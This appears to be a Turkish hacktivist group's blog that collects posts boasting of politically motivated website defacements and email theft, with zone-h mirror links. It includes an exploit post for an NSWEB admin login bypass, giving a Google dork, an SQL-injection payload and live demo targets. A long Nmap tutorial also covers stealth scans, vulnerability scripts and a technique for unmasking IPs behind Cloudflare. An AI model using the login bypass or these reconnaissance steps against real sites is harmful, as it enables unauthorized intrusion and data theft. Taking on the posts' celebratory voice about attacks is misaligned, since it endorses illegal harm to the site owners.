-->

Anonturkey.org Hacked

Selamun Aleykum,

Dün gece geç saatlerde Cumhurbaşkanımız hakkında Anonymous tarafından ahlaksız bir paylaşım yapıldı.
Bu devletin başında her kim olursa olsun yapılacak bir saygısızlık Türk milletine yapılmış bir saygısızlıktır!
Bu topluluğun Türkiye kolu olarak geçinen, geçinmeye çalışan ve kendilerini bu şekilde gösterenlere "Sipahilerin" mührünü vurduk!

İndexte gereken her şey yazıyor...

zone: http://www.zone-h.org/mirror/id/30823099?zh=1



Varan 2! Anonturkey Twitter Hesabı Hacked!

Dün akşam saatlerinde bu çapulcuların sitesine uğramıştık.
İlgili Konu; Özel Saldırılar - Anonturkey.org Hacked!

Hemen akabinde bunlardan alışık olduğumuz "Bize ait değil" açıklaması beklerken daha farklı bir söylem ile karşı karşıya kaldık. Hoş bu tür sözlere de alışkınız.. 

"Cumhurbaşkanımıza yapılan ahlaksızlığa cevap verdik diye Milli Şuur ve feraset noktasında kurulduğumuz ilk günden beridir taviz vermeyen ve hiç bir karşılık beklemeden Sayısız operasyona imza atmış Sipahiler’e “Paralı Köpek” yakıştırmasını yapabilecek kadar hadsiz ve onursuz bu oluşumun son kolu twitter hesabına da "Sipahi" mührü vurduk. "



Emeği geçen Sipahiler personelinin yüreğine sağlık... 
Unuttuğunuz ne var ise hatırlatmaya geliyoruz...

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler

Türk hackerlardan IKBY'ye şok! Mailleri ele geçirdiler


Türk hackerlar gayrimeşru referandumla Türkiye'nin de güneydoğusuna göz diken IKYB'nin meclis sitesini hackledi. Sitedeki yazışmaları ele geçirdi.

Hukuksuz referandumla Irak'ı parçalamaya götüren ve sözde bağımsızlık referandumundan Türkiye'nin güneydoğusuna da göz diken Irak Bölgesel Kürt Yönetimi'ne (IKBY), Türk hackerlar siber operasyon düzenledi. 

Turkz Hacker Grubu, IKBY Parlamentosu'na ait verileri ele geçirdiğini duyurdu ve bazı mailleri yayınladı. Söz konusu mailler arasında Türkiye'ye karşı görev almak isteyen provokatörlerin de mailleri görüldü.

Türkye düşmanlarına karşı siber operasyonlara devam edeceğini belirten Turkz Hacker Grubu, terör örgütü PKK'ya hizmet eden bir hacker grubunu da hackledi. 
Türk hackerlar siber operasyonu böyle duyurdu:

KAYNAK: 

İcratler :

site: http://www.kurdistan-parliament.org/
zone: http://zone-h.org/mirror/id/30298398
zone: http://defacers.org/view->437386

Not: Cloudflareden Dolayı Yönlendirme Görünmemektedir

site: http://www.kurdishack.com/

zone: http://mirror-h.org/browse/972571/
zone: http://www.aljyyosh.org/mirror.php?id=204823
zone: http://defacers.org/view->437385
zone: http://archive.is/iHLwz
zone: http://archive.is/iHLwz/image

Detaylar: 



Türk Hackerlardan Terör Devleti Israil'e Büyük Şok!

 Turkz Hacker Grubu terör devleti İsrail'in Mescidi Aksa'da başlatmış olduğu zulme sessiz kalmadı.

Terör devleti İsrail'in son zamanlarda Mescid-i Aksa'yı kapatmasına ve Müslümanlara uyguladığı şiddete kayıtsız kalmayan Turkz Hacker Grubu, 100 İsrail sitesini hackledi. 

Turkz Hacker Grubu terör devleti İsrail'e "Özgür Filistin" mesajı verirken sitelerinden ezan ve sela okuttu.

Turkz Hacker Grubu İsrail'e vurduğu darbeyi böyle duyurdu:



NSWEB Admin Login Bypass

#################################################################################
# Exploit Title: NSWEB Admin Login Bypass
# Author : Sipahiler / TurkZ.org
# Date : 2017-07-26
# Google Dork : intext: NSWEB © Copyright 2017. All Rights Reserved
# Tested on : Kali Linux 2017.1 And W7
# Vendor Home : http://www.nsweb.rs/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/  
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: 'or' '='
[+] Password: 'or' '='

Demo :
http://www.nsweb.rs/admin
http://www.nskoncept.rs/admin/

Greet'Zzz :  Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & AKA_1NF4z & Kutluhan & Alianz & S1R

Nmap Kullanimi

Selamun Aleyküm ..
Nmap, bilgisayar ağları uzmanı Gordon Lyon (Fyodor) tarafından geliştirilmiş bir güvenlik tarayıcısıdır. Taranan ağın haritasını çıkarabilir ve ağ makinalarında çalışan servislerin durumlarını, işletim sistemlerini, portların durumlarını gözlemleyebilir.
Nmap kullanarak ağa bağlı herhangi bir bilgisayarın işletim sistemi, çalışan fiziksel aygıt tipleri, çalışma süresi, yazılımların hangi servisleri kullandığı, yazılımların sürüm numaraları, bilgisayarın güvenlik duvarına sahip olup olmadığı, ağ kartının üreticisinin adı gibi bilgiler öğrenilebilmektedir.
Nmap tamamen özgür GPL lisanslı yazılımdır ve istendiği takdirde sitesinin ilgili bölümünden kaynak kodu indirilebilmektedir. Nmap' ın kullanılabildiği işletim sistemleri LinuxWindowsMacOSSolaris, *BSD ve AmigaOS olarak sıralabilir fakat popülerliği öncelikle Linux daha sonrasında Windows' ta dır.
Kaynak : Vikipedia
Nmap herhangi bir istemci veya sunucuyu birçok farklı şekilde tarama yeteneğine sahiptir. Nmap'i güçlü kılan farklı tarama tekniklerine sahip olmasıdır. Protokol temelli (TCP, UDP, vb.) tarama yapılabileceği gibi, belirli aralıklardaki IP adresleri, alt ağlar (subnet) ve üzerlerinde çalışan port ve servisleri de taranabilir.[1]
Tarama sonuçlarında ortaya çıkabilecek port durumları aşağıdaki gibidir :
Open (Açık): Portun erişilebilir durumda olduğunu ve port üzerinde bir uygulamanın TCP bağlantılarını ya da UDP datagramlarını kabul ettiği anlamına gelmektedir.
Closed (Kapalı): Portun erişilebilir olduğunu (Paketleri almakta ve geri paket göndermekte) fakat üzerinde herhangi bir uygulamanın olmadığı anlamını taşımaktadır.
Filtered (Filtreli): Dönen tepkiler bir paket filtreleme mekanizması tarafından engellenir. Nmap portun açık olduğuna karar veremez.
Unfiltered (Filtresiz): Portlar erişilebilir ancak Nmap portların açık veya kapalı olduğuna karar veremez. (Sadece ACK scan için )
Open|filtered (Açık|Filtreli): Nmap portların açık veya filtrelenmiş olduğuna karar veremez. (UDP, IP Protocol, FIN, Null, Xmas Scan için )
Closed|filtered (Kapalı|Filtreli): Nmap portların kapalı ya da filtreli olduğuna karar veremez. (Sadece Idle Scan için )

Nmap Tarama Türleri 
TCP SYN (Half Open) Scan : 
Hedefe TCP SYN gönderilir. Portlarin Kapali Olduğu Durumlarda Hedef Makina VCevağ Olarak RST + ACK Döner.
Portlarin Açık Olduğu Durumlarda İse Hedef Makina SYN + ACK Bayrakli Segment Döndürür. Daha Sonra Kaynak Makina RST Bayrakli Segment Göndererek Bağlantiyi Koparir Ve Böylelijle TCP Üçlü El Sıkışma (TCP Three-Way Handshaking) Tamamlanmaz. Bu Tarama Türünce TCP Üçlü El Sıkışma Gerçekleşmediği İçin Bu Tarama Türü Hedef Sistemlerinde Herhangi Bir Şekilde İz Birakmaz.
Kullanım Şekli : nmap -sS -v hedef_ip_adresi

TCP Connect Scan : 
Kaynak Makinanin Gerçekleştireceği TCP Connet Scan, Kapali Portlara Yapildiği Zaman RST + ACK Bayrakli Segment Dönecektir. Ancak Açık Portlara Yapildiği Durumlarda Hedef Makinanin Göndereceği SYN + ACK Bayrakli Segmenti, Kaynak Makina ACK Bayrakli Segment Göndererek Cevaplar Ve Üçlü El Sıkışmayi Tamamlar.
Kullanım Örneği: nmap -sT -v hedef_ip_adresi

FIN (Stealth) Scan  :
Hedef Makinaya TCP Bağlanti İstegi Olmadan Gönderilen Segmentle Tarama Yapilir. Kaynak Makinanin Göndereceği FIN Bayrakli Segment, Hedef Makinanin Kapali Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Açık Portuna Gelirse Hedef Makinadan Herhangi Bir Tepki Dönmeyecektir.
Kullanım Şekli : nmap -sF -v hedef_ip_adresi

Xmas Scan :
Bu Tarama Türünde Kaynak Bilgisayarin TCP Segmentine, URG,PSH Ve FIN Bayraklarini Set Edeceği ("1" Yapilacaği) Segment Hedef Makinaya Gönderilir. Eğer Kaynak Makinanin Gödereceği URG,PSH Ve FIN Bayrakli Segment, Hedef Makinanin Kapalı Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Bu Tarama Türünde TCP Başlığı İçerisinde Yer Alan Toplam Altı Adaet Bayraktan Üç Tanesi Set Edildiği ("1" yapildiği) İçin, Gönderilen Segment Yılbaşı Ağacının Yanan Lambalarina Benzetilmiştir. Bundan Dolayida  Bu Tarama Türüne Xmas (Christmas) Scan Denmiştir. 
Kullanım Şekli: nmap -sX -v hedef_ip_adresi

Null Scan : 
Hiç Bir Bayrağın Bulunmayacağı Bu Tarama Türü, Gerçek Hayatta Karşımıza Çıkmayan Bir Durumdur. Kaynak Makinan,in Gödereceği Bayraksız Segmentler Karşısında Hedef Makinanin Vereceği Tepkiler FIN Scan İle Aynıdır. Kaynak Makinanın Göndereceği Bayraksız Segment, Hedef Makinanin Kapalı Bir Portuna Gelirse Hedef Makina RST + ACK Bayrakli Segment Döndürecektir. Eğer Port Açık Olursa Hedef Makinadan Herhangi Bir Tepki Dönmeycektir.
Kullanım Şekli : nmap -sN -v hedef_ip_adresi

Ping Scan : 
Bu Tarama Türünda Kaynak Makina Hedef Makinaya Tek Bir ICMP Echo İstek Paketi Gönderir. İP Adresi Erişebilir Ve ICMP Filtreleme Bulunmadığı Sürece, Hedef Makinaya ICMP Echo Cevabi Döndürecektir. Eğerü Hedef Makina Erişilebilir Değilse Veya Paket Filtreleyici ICMP Paketlerini Filtreliyorsa, Hedef Makinadan Herhangi Bir Cevap Dönmeyecektir. 
Kullanım Şekli : nmap -sP -v hedef_ip_adresi

UDP Scan : 
Kaynak Makinanın Hedef Makinaya UDP Datagramina, ICMP Port Unreachable Cevabi Döndürülüyorsa Hedef Makina Kapali Kabul Edilecektir. Herhangi Bir Tepki Döndürmeyen Hedef Makina Open|Filtered Kabul Edilecektir. UDP Datagramiyla Cevap Döndüren Hedef Makinaya Ait Port İse Açık Kabul Edikecektir.
Kullanım  Şekli : nmap -sU -v hedef_ip_adresi

IP Protocol Scan : 
Bu Tarama Türü Standart Nnamp Tarama Türlerinden Biraz Farklidir. Bu Tarama Türünde Hedef Makinalarin Üzerlerinde Çalışan IP Tabanli Protokoller Tespit Edilmektedir. Bu Yüzden Bu Tarama Türüne Tam Anlamiyla Bir Port Taramasi Demek Mümkün Değildir. Hedef Makina Üzerinde Taramasını Yaptığımız İP Protokolü Aktif Haldeyse Makinadan Bu Taramaya Herhangi Bir Cevap Gelmeyecektir. Hedef Makina Üzerinde, Taramasini Yaptıgımız IP Protokolü Aktif Halde Değilse Hedef Makinadan Bu Taramaya, Tarama Yapılan Protokolün Türüne Göre Değişebilen RST Bayrakli (RST Bayraği "1" Yapılmış) Bir Segment Cevap Olarak Gelecektir.
Kullanım Şekli : nmap -sO -v hedef_ip_adresi

ACK Scan : 
Bu Tarama Türünde Kaynak Makina Hedef Makinaya TCP ACK Bayrakli Segment Gönderir. Eğer Hedef Makina ICMP Destination Unreachable Mesajını Dönerse Ya Da Hedef Makinada Bu Taramaya Karşılık Herhangi Bir Tepki Oluşmazsa Port "filtered" Olarak Kabul Edilir. Eğer Hedef Makina RST Bayrakli Segment Döndürürse Port "unfiltered" Kabul Edilir.
Kullanım Şekli : nmap -sA -v hedef_ip_adresi

Window Scan : 
Window Scan, ACK Scan TürüneBenzer Ancak Bir Önemlii Farki Vardir. Window Scan Portlarin Açık Olma Durumlarini Yani "OPEN" Durumlarini Gösterebilir. Bu Taramanin İsmi TCP Windowing İşleminden Gelmektedir. Bazı TCP Yığınlari, RST Baraktli Segmentlere Cevap Döndüreceği Zaman, Kendilerine Özel Window Boyutlari Sağlarlar. Hedef Makinaya Ait Kapali Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sifirdir. Hedef Makinaya Ait Açık Bir Porttan Dönen RST Segmentine Ait Window Boyutu Sıfırdan Farkli Olur.
Kullanım Şekli : nmap -sW -v hedef_ip_adresi

Idle Scan : 
Bu Tarama Türü Kaynak Makinanin Hedef Makinaya Tarama Esnasinda Aktif Olarak Rol Almadığı Bir Türdür. Kaynak Makina "ZOMBİ" Olarak Nitelendirilen Makinalar Üzerinden Hedef Makinayi Tarayarak Bilgi Toplar.
Kullanım Şekli : nmap -sl -v zombi_ip hedef_ip_adresi

Nmap Betik Motoru (Nmap Scripting Engine -NSE)
NSE (Nmap Script Engine) Nmapin En Güçlü Ve Kullanışlı Özelliklerinden Birisidir. NSE'yi Normal Nmap Komutlariyla Yapılamayan Yada Yapılması Çok Zor Olan İşlemlerin Daha Kolay Bir Şekilde Yapılmasının Sağlandığı Bir Betikler Bütünü Olarak Tarif Edebiliriz. Nmap İle Birlikte Bir Çok Betik Kütüphanesi Hazır Olarak Gelmektedir. NSE Kullanılarak Temel Olarak Yapılabilecekler Aşağıda Listelenmiştir.
1) Ağ Keşifleri: Hedef Etki Alanlarının Whois Veri Tabani Sorgulari Yapilabilir. Hedef Sistemlerin SNMP Sorgulari Yapılabilir Ve Mevcut NFS/SMB/RPC Paylaşım Ve Servisleri Listenilebilir.

2) Karmaşık Versiyon Tespiti: Normal Nmap Komutlariyla Hedef Sistemlerin Versiyonlari Belirlenebilmektedir. NSE İle Hedef Sistemlerin Versiyonlari Çok Daha Ayrıntili Bir Şekilde Tespit Edilebilir.
3)  Zafiyet (Vulnerability) Tespiti: Normal Nmap Komurtlariyla Hedef Sistemlerin Zafiyetleri Tam Anlamıyla Tespit Edilememektedir. NSE İle Bu Zafiyetler Daha Kolayca Belirlenebilir. Nmap İle Hazır Gelen Biir Çok Zafiyet Tespit Betiği Bulunmaktadir. Ancak Temel İşlevinin Zafiyet Tarayicisi Olmadığının Bilinmesi Gerekir.
4) Arka Kapi (Backdoor) Tespiti: NSE  Bazi Arka Kapi Programlarinida Tespit Edebilmektedir.
5)  Zafiyet Sömürmesi (Vulnerability Exploitation) NSE İle Sadece Hedef Sistemlerin Zafiyetkeri Tespit Edilmekle Kalmayip Bu Zafiyetlerin Bazıları Kullanilarak Hedef Sistemlere Sızılmasi Mümkün Olmaktadir. Fakat Nmap'in Temel Amaci Metasploit Gibi Bir Zafiyet Sömürü Programina Dönüşmek Değildir. Buna Ragmen NSE İle Hedef Sistemlerdeki Bazi Zafiyetlerin Sömürülmeside Mümkündür.NSE 'nin Geliştirilmesine Devam Edilmektedir.

Nmap Tarama Örneklei : 
nmap -sS -sV -Pn -top-ports 10 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
Top-ports10: En Çok Kullanilan 10 Portu Tara.
nmap -sS -sV -Pn -T4 -p- 192.168.38.130
sS : Syn Taramasi 
sV : Versiyon Bilgisi
Pn : Ping Atma 
T4 : Tarama Hizi Hizli Bir Tarama.
-p- : Tüm Portlari Tara
Bu Tarama Çok Uzun Sürdüğü İçin Hazır Taranmış Bir Ekran Görüntüsü Koyuyorum.

nmap -sS -A -Pn -oA sonuclar 51.255.10.187
sS : Syn Taramasi 
A  : Versiyon Ve İşletim Sistemi Bilgisi
Pn : Ping Atma 
oA : 3 Farkli Formatta Tarama Çıktısını Kaydeder.

nmap --script ftp-anon -p 21 51.255.10.187
script : Nmap Scriptlerini Kullanmamizi Sağlar.
ftp-anon : Ftp 'ye Anonim Girişi Olup Olmadıgını Kontrol Eder.
p 21 : Port 21 de Scripti Çalıştırır
Zafiyet Oldugunda 2.ci Komut Satirindaki Gibi Belirtir.

nmap --script http-dombased-xss www.trazer.org
script : Nmap Scriptlerini Kullanmamizi Sağlar.
http-dombased-xss : trazer.org'da xss ara
Couldn't find any DOM based XSS.=
Yani Herhangi Bir Dom Tabanli XSS Bulunamadı :) 

Ek Olarak Nmap İle cloudflare Bypass Yapabilirsiniz. Aslında Bypass Demiyelimde Otomatik Olarak Nmap Aracı İle Hedef Sistemin Dns Üzerindeki Tüm Alan Adlarina Subdomain Vs Brute Force Yapilarak Alt Alan Adlari Tespit Edilip Gerçek İp Adresi Bulunabilir. 
nmap --script dns-brute -sn hedefsite.com

Benim Size Aktarma İstediklerim Bu Kadardı Sizler İçin Sağ Soldan Toparladım Ve Bu Çıktı Ortaya
Umarım Anlaşılır Olmuştur. Nmap Scriptlerini /usr/share/nmap/script/ Klasörü Altında Bulup İnceleyebilirsiniz. Bu Yazımızda Nmap Aracının Çok Kaliteli Bir Keşif Aracı Olduğunu Uygulayip Öğrenmiş Olduk.
Nmap Kullanımı Hakkinda Daha Detayli Bilgi İçin Buradaki Linke Göz Atabilirsiniz.

TrazeR Sunar //

hpg-online.org hacked

Selamun Aleykum..

Uzun bir zamandır PKK ve Terör yanlısı tüm aktiviteleri yakından takip ettiğimizi söylemiştik.
Bu doğrultuda daha önce de hacklediğimiz,PKK'nın askeri kanadı olan HPG yi an itibari ile yine yeniden hacklemiş bulunuyoruz.

Apo itlerine,PKK'nın HPG kanadına "komando" marşı dinlettik! İndex'i 4 saat sonunda kaldırabildiler :)

Operasyonlarımız aralıksız devam ediyor,PKK'ya ait önemli diğer sitelerde Turkz Grup Sipahiler damgası yiyecektir. Tek tek inlerine gireceğiz beklemede kalın..





TurkZ Grup
#Sipahiler
#TrazeR